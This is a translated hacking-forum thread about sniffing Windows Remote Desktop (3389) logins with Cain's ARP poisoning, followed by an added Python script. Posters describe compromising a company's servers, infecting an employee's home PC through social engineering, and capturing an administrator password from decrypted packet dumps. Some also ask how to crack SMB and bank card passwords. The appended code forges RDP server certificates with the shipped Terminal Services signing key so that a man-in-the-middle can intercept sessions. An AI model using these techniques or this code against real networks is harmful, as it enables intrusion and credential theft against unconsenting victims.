With ARP poisoning on, [color=red]as soon as I connected to the target with the 3389 client (before entering a password), Cain's RDP sniffer already showed captured data[/color]. I then entered the correct account and password and logged in successfully, and afterwards looked at the captured data again. Where the username normally appears was the username already stored in my terminal client, not the one I actually logged in with, and there was no password after it. Then I searched the data. Going by the pattern usernames appear in, n.a.m.e style, I did a full-text search, and I could find the username I actually logged in with, but still no password. (Passwords would appear in the same p.a.s.s pattern.)
.......[/quote]
Haven't been online for two days; 唐不狐 has already said what I was going to say...
My experiment went as follows:
Zombie: database server A of a big Korean company, Windows 2000. Nearly every employee machine on the same company LAN had 3389 open, all XP. I picked one target B (owner Z). Through social engineering I got Z's home PC C infected with my HGZ, then ran Cain on A to sniff B's 3389. Through HGZ's screen monitoring I watched Z log into B's 3389 from C. The login box initially showed account ABC, but C logged in with account XYZ and password UVW. After the login succeeded I immediately logged into A to look at the data Cain had sniffed: it showed only the domain, the username ABC, C's IP address, etc.... neither XYZ nor UVW appeared... After Z logged out of B, I enabled a second 3389 session on C and, from C, logged into B with account XYZ and password UVW; on A only XYZ was sniffed, not the password UVW. Same result when I logged into B from my own machine..
Could an expert explain this.

On a LAN it's still better to use Sniffer`
the sniffing success rate is higher too~

玫瑰, I installed it following your method
but on the ARP tab the + button is greyed out
Could it be because this came up when I installed WinPcap
Is that the problem
[img]http://www.cfsbw.com/Images/0.jpg[/img]
[img]http://www.cfsbw.com/Images/1.jpg[/img]
Anyone who knows, please say

Only a minority have the habit of saving passwords
Still, the OP's method is good; it seems articles about 3389 are getting more and more common

***************************************
- Symmetric encryption phase reached...
***************************************
[Client decrypted packet] - 365 bytes total; 338 bytes decrypted
0000 03 00 01 6d 02 f0 80 64 00 06 03 eb 70 81 5e 48 ...m...d....p.^H
0010 00 00 00 7a 87 c9 73 72 47 c2 79 04 08 04 08 b3 ...z..srG.y.....
0020 43 00 00 08 00 1a 00 00 00 00 00 00 00 59 00 4d C............Y.M
0030 00 53 00 54 00 00 00 61 00 64 00 6d 00 69 00 6e .S.T...a.d.m.i.n
0040 00 69 00 73 00 74 00 72 00 61 00 74 00 6f 00 72 .i.s.t.r.a.t.o.r
0050 00 00 00 00 00 00 00 00 00 02 00 18 00 31 00 39 .............1.9
0060 00 32 00 2e 00 31 00 36 00 38 00 2e 00 31 00 2e .2...1.6.8...1..
0070 00 39 00 00 00 40 00 43 00 3a 00 5c 00 57 00 49 .9...@.C.:.\.W.I
0080 00 4e 00 44 00 4f 00 57 00 53 00 5c 00 73 00 79 .N.D.O.W.S.\.s.y
0090 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 6d .s.t.e.m.3.2.\.m
00a0 00 73 00 74 00 73 00 63 00 61 00 78 00 2e 00 64 .s.t.s.c.a.x...d
00b0 00 6c 00 6c 00 00 00 20 fe ff ff 2d 4e fd 56 07 .l.l... ...-N.V.
00c0 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e...........
Didn't work; what comes right after is the IP!~~~ what's going on, someone explain``

I once saw a QQ tutorial saying it can be cracked on the local machine
not sure if that's right

Can 3389 passwords be captured and decrypted over the Internet too? I tested, and it seems it only sniffs Administrator, but the password gives no result at all; no idea why?

I'm having a problem using this here.
ipconfig /all on my machine shows IP 192.168.1.20
After running the sniffer, it can't sniff my own machine's IP and real MAC address.
How should I handle this?

[Client decrypted packet] - 919 bytes total; 892 bytes decrypted
0000 03 00 03 97 02 f0 80 64 00 06 03 eb 70 83 88 48 .......d....p..H
0010 00 00 00 af 3d d0 81 b3 b7 37 fa 00 00 00 00 b3 ....=....7......
0020 03 00 00 0c 00 1a 00 00 02 00 00 00 00 4f 00 47 .............O.G
0030 00 57 00 45 00 42 00 33 00 00 00 41 00 64 00 6d .W.E.B.3...A.d.m
0040 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 00 74 .i.n.i.s.t.r.a.t
0050 00 6f 00 72 00 00 00 a5 7a e3 db 97 d9 38 c8 31 .o.r....z....8.1
0060 94 59 88 24 2e f2 4d 2a 8c a7 c3 ee 09 84 84 a0 .Y.$..M*........
0070 30 6d b6 26 f3 63 f1 f6 91 77 f9 b4 4f 16 28 c2 0m.&.c...w..O.(.
0080 ec 19 77 a0 73 91 3b 75 b4 80 ef fe 1e 6a e5 15 ..w.s.;u.....j..
0090 98 13 56 73 b5 1d f7 86 da ff aa bb 0b bb 1a 8d ..Vs............
00a0 02 9c 5a 1a 68 ca d0 48 d7 5c 7a 60 23 b4 23 88 ..Z.h..H.\z`#.#.
00b0 ae 85 ee bb 5d 38 4e 32 24 81 d4 f3 9d 20 1e 79 ....]8N2$.... .y
00c0 ba d6 ad 3c b4 09 02 4c 28 04 27 18 33 57 67 5b ...<...L(.'.3Wg[
00d0 a2 7f 63 c6 84 df f1 a4 eb f6 c9 0f 51 61 3b b1 ..c.........Qa;.
00e0 f3 f6 47 2a 5a c7 48 0f ab 6d b7 0a 7c 25 52 4f ..G*Z.H..m..|%RO
00f0 62 26 48 59 34 26 37 de d4 e7 82 0b e2 83 9f de b&HY4&7.........
0100 c0 3d ad 59 d1 7d aa 51 da 8e 84 9b 2c 0e 2a 72 .=.Y.}.Q....,.*r
0110 4f 52 fd 0f d3 23 b9 dc 2b 5a cc 99 30 f7 11 6e OR...#..+Z..0..n
0120 23 90 4d c0 13 c4 6f 60 0b 8d ad a7 84 e2 c3 8d #.M...o`........
0130 bd 3d 7d 54 ec b6 50 8a 44 b4 91 b4 45 5e 4b bd .=}T..P.D...E^K.
0140 ab 90 9f 5a f8 71 16 04 42 5b de 26 5f a4 df ee ...Z.q..B[.&_...
0150 33 ec b6 7d c0 52 8d 0d 3a 25 fc 79 ca fa 58 aa 3..}.R..:%.y..X.
0160 6c e2 7c a6 83 32 03 fe a9 4b 5b 34 fb 3b 6e 10 l.|..2...K[4.;n.
0170 45 01 11 d0 30 b8 34 68 85 b1 82 42 a8 a0 1d dd E...0.4h...B....
0180 af a5 12 63 f0 f8 92 15 79 81 88 f7 77 ea 21 f2 ...c....y...w.!.
0190 28 1b 94 20 12 04 91 b0 36 c3 c7 d4 02 18 92 be (.. ....6.......
01a0 78 4e f7 c7 00 ca d0 ee a1 c6 f7 2c 87 b9 24 2f xN.........,..$/
01b0 cb 15 03 c1 b9 5d f0 d6 81 a0 83 61 6e 1c 3a 12 .....].....an.:.
01c0 2a ee 54 29 2a 8c 52 c8 01 a8 22 bc 04 a2 97 99 *.T)*.R...".....
01d0 75 25 37 7c d7 e9 e5 38 a1 25 fd 44 5a 05 07 8c u%7|...8.%.DZ...
01e0 10 47 c6 41 5f cc 0d e1 23 9b 2a 9e 57 94 9d ce .G.A_...#.*.W...
01f0 41 97 85 99 1d 7e c0 c5 b2 12 0d 96 b4 94 27 88 A....~........'.
0200 f3 d5 f7 84 07 a5 71 45 7f f6 12 22 de 04 91 26 ......qE..."...&
0210 22 58 b6 8c ff 4f ae 14 e3 3c d0 56 40 a6 47 f7 "X...O...<.V@.G.
0220 0a ff eb 86 ab 93 f4 2b c2 73 54 bb 6a ce 90 23 .......+.sT.j..#
0230 33 89 1c 48 e9 67 7a 69 de 4a 1a 25 5c ea a8 f4 3..H.gzi.J.%\...
0240 69 b3 79 ac f2 4f 94 7e 5c 52 8b d0 5c b6 2e e7 i.y..O.~\R..\...
0250 b6 8a 6b d2 ed 7f 81 00 00 00 00 00 00 02 00 1a ..k.............
0260 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 00 2e .1.9.2...1.6.8..
0270 00 30 00 2e 00 31 00 35 00 00 00 62 00 45 00 3a .0...1.5...b.E.:
0280 00 5c 00 6f 8f f6 4e 27 59 68 51 5c 00 33 00 33 .\.o..N'YhQ\.3.3
0290 00 38 00 39 00 dc 8f 0b 7a 7b 76 46 96 68 56 5c .8.9....z{vF.hV\
02a0 00 77 00 77 00 77 00 2e 00 43 00 68 00 69 00 6e .w.w.w...C.h.i.n
02b0 00 61 00 44 00 6f 00 77 00 6e 00 5a 00 2e 00 63 .a.D.o.w.n.Z...c
02c0 00 6f 00 6d 00 5c 00 6d 00 73 00 74 00 73 00 63 .o.m.\.m.s.t.s.c
02d0 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 00 20 .a.x...d.l.l...
02e0 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 65 f4 95 00 ...-N.V.h.Q.e...
02f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0330 00 00 00 00 00 00 00 2d 4e fd 56 07 68 c6 51 f6 .......-N.V.h.Q.
0340 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e...............
0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ................
0390 00 00 00 00 00 00 00 .......
My sniffing result is the above; what's going on? Please advise

[Client decrypted packet] - 393 bytes total; 366 bytes decrypted
0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 .......d....p.zH
0010 00 00 00 b2 8c 52 c8 09 50 3d 25 04 08 04 08 bb .....R..P=%.....
0020 43 00 00 00 00 1a 00 10 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 50 00 41 00 53 .a.t.o.r...P.A.S
0050 00 53 00 57 00 4f 00 52 00 44 00 00 00 00 00 00 .S.W.O.R.D......
0060 00 02 00 1c 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0070 00 38 00 2e 00 31 00 2e 00 32 00 31 00 31 00 00 .8...1...2.1.1..
0080 00 50 00 45 00 3a 00 5c 00 51 00 51 00 44 00 6f .P.E.:.\.Q.Q.D.o
0090 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 5c 00 e5 .w.n.l.o.a.d.\..
00a0 5d 77 51 5c 00 73 00 65 00 72 00 76 00 65 00 72 ]wQ\.s.e.r.v.e.r
00b0 00 32 00 30 00 30 00 33 00 5c 00 6d 00 73 00 74 .2.0.0.3.\.m.s.t
00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x...d.l.l
00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 ... ...-N.V.h.Q.
00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e...............
00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 ...........-N.V.
0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e...........
0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0180 00 00 00 07 00 00 00 00 00 .........
Nice, the password came out.
A question while I'm here: how do you crack SMB passwords?

[quote]Quoting post #30 by 唐不狐, posted 2007-02-11 20:09:
So far my tests can only confirm that 猪三's experience is correct
Environment: two 2003 Servers under the same switch. I installed Cain 4.2 (downloaded from 玫瑰's link) on one of them and configured the sniffer for Terminal/RDP. (I changed the port; it isn't the default 3389, but I don't think that affects the result.)
I noticed the following:
With ARP poisoning on, [color=red]as soon as I connected to the target with the 3389 client (before entering a password), Cain's RDP sniffer already showed captured data[/color]. I then entered the correct account and password and logged in successfully, and afterwards looked at the captured data again. Where the username normally appears was the username already stored in my terminal client, not the one I actually logged in with, and there was no password after it. Then I searched the data. Going by the pattern usernames appear in, n.a.m.e style, I did a full-text search, and I could find the username I actually logged in with, but still no password. (Passwords would appear in the same p.a.s.s pattern.)
.......[/quote]
I tested specifically in a switched environment; exactly the same conclusion as 唐不狐

Not testing any more; few people open 3389 these days, and those who do no longer use administrator

Dug up this thread again.
Updating the conclusion.
3389 sniffing only yields plaintext when the client sends the username and password together; that is, when the account and password have both been entered in the connection dialog beforehand, not necessarily saved.

Most of the machines I come across log in as ADMINISTRATOR
I'll download it and give it a try

=== Cain's RDP sniffer generated file ===
===========================================
[RDP connection]
--------------
Server address: 125.90.80.150
Client address: 59.62.18.34
--------------
Why is there no data... just these IPs.....

Last time Kaspersky flagged malicious code on your ncph.NET,
probably a problem with the page files

What can be used to decrypt the sniffed encrypted bank card passwords..

Why can't I change the IP range to scan?

My antivirus says this has a virus!
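The APR-RDP help text quoted earlier in this thread says the proprietary server certificate is signed by MD5-hashing 108 bytes of the certificate and RSA-"encrypting" the hash with a private key that ships inside mstlsapi.dll, and lists that key. Below is an added example from the editor, not Cain's code and not something anyone in the thread posted, that reproduces the signature and the client-side check in Python with the key as listed there. Two details are assumptions not stated on the page: the 108-byte region is taken to be the PROPRIETARYSERVERCERTIFICATE fields from dwVersion through the RSA_PUBLIC_KEY blob (which comes to exactly 108 bytes for a 512-bit key), and the padding the client expects after the public operation (MD5, 0x00, 46 bytes of 0xFF, 0x01, little-endian) follows what open-source RDP clients check. The stand-in modulus in demo() is arbitrary bytes, not a real key.

```python
"""The proprietary server-certificate signature from the Cain help text: MD5 of the
certificate's public-key region, RSA private operation with a key every Windows client
carries. Anyone holding that key can sign any modulus, which is what the MITM does."""
import hashlib
import struct

KEY_LEN = 64  # 512-bit RSA: every integer travels as a 64-byte little-endian string

# Terminal Services signing key exactly as listed in the help text (little-endian byte order).
TSSK_E = int.from_bytes(bytes.fromhex("5b7b88c0"), "little")
TSSK_N = int.from_bytes(bytes.fromhex(
    "3d3a5ebd72433ec94dbbc11e4aba5fcb3e882087eff5c1e2d7b76b9af2524595"
    "ce63656b583afeef7ce7bffe3df65c7d6c5e06091af561bb2093095f056dea87"), "little")
TSSK_D = int.from_bytes(bytes.fromhex(
    "87a71932da11875558001616256568f8243ee6fae9674994cf92cc3399e80860"
    "179a129f24ddb12499c73ab80a7b0ddd350779170b519bb3c7100113e73ff35f"), "little")


def signed_region(pub_exp, modulus_le):
    """The 108 bytes the client hashes: dwVersion, dwSigAlgId, dwKeyAlgId, wPublicKeyBlobType,
    wPublicKeyBlobLen, then the RSA_PUBLIC_KEY blob ('RSA1' magic, keylen, bitlen, datalen,
    pubExp, modulus plus 8 zero bytes). Layout assumed from MS-RDPBCGR PROPRIETARYSERVERCERTIFICATE."""
    if len(modulus_le) != KEY_LEN:
        raise ValueError("modulus must be %d little-endian bytes" % KEY_LEN)
    blob = struct.pack("<4sIIII", b"RSA1", KEY_LEN + 8, KEY_LEN * 8, KEY_LEN - 1, pub_exp)
    blob += modulus_le + bytes(8)
    # CERT_CHAIN_VERSION_1, SIGNATURE_ALG_RSA, KEY_EXCHANGE_ALG_RSA, BB_RSA_KEY_BLOB, blob length
    return struct.pack("<IIIHH", 1, 1, 1, 6, len(blob)) + blob


def padded_digest(region):
    """What the RSA public operation must yield: MD5 || 0x00 || 46 * 0xFF || 0x01 (little-endian)."""
    return hashlib.md5(region).digest() + b"\x00" + b"\xff" * (KEY_LEN - 18) + b"\x01"


def ts_sign(region):
    """Produce the 72-byte SignatureBlob the way the terminal server (or a MITM holding the same
    key) does: private operation on the padded digest, then 8 zero bytes."""
    m = int.from_bytes(padded_digest(region), "little")
    return pow(m, TSSK_D, TSSK_N).to_bytes(KEY_LEN, "little") + bytes(8)


def ts_verify(region, signature_blob):
    """The client-side check: public operation with e, then compare digest and padding bytes."""
    if len(signature_blob) != KEY_LEN + 8 or signature_blob[KEY_LEN:] != bytes(8):
        return False
    s = int.from_bytes(signature_blob[:KEY_LEN], "little")
    if s >= TSSK_N:
        return False
    recovered = pow(s, TSSK_E, TSSK_N).to_bytes(KEY_LEN, "little")
    return recovered == padded_digest(region)


def forge_certificate(attacker_modulus_le, attacker_exp=0x10001):
    """Step 2-5 of the help text's 'How it works': build the region for the MITM's own key and
    sign it; ts_verify cannot tell the result from a certificate the real server produced."""
    region = signed_region(attacker_exp, attacker_modulus_le)
    return region, ts_sign(region)


def demo():
    # Stand-in for the 512-bit key a MITM would generate (deterministic bytes, not a real RSA
    # modulus): the signature covers bytes, so the value is irrelevant to whether it verifies.
    stand_in_modulus = bytes((7 * i + 3) & 0xFF for i in range(KEY_LEN))
    region, sig = forge_certificate(stand_in_modulus)
    return region, sig, ts_verify(region, sig)


if __name__ == "__main__":
    region, sig, ok = demo()
    print("signed region: %d bytes, signature blob: %d bytes, client accepts: %s"
          % (len(region), len(sig), ok))
```

Because ts_sign() needs nothing beyond the key printed in the help text, a certificate for any modulus the MITM chooses verifies exactly like the real server's: the check proves only that the signer knew a key present on every Windows installation, which is why the patched clients described in the help text still accept the substituted key without a warning.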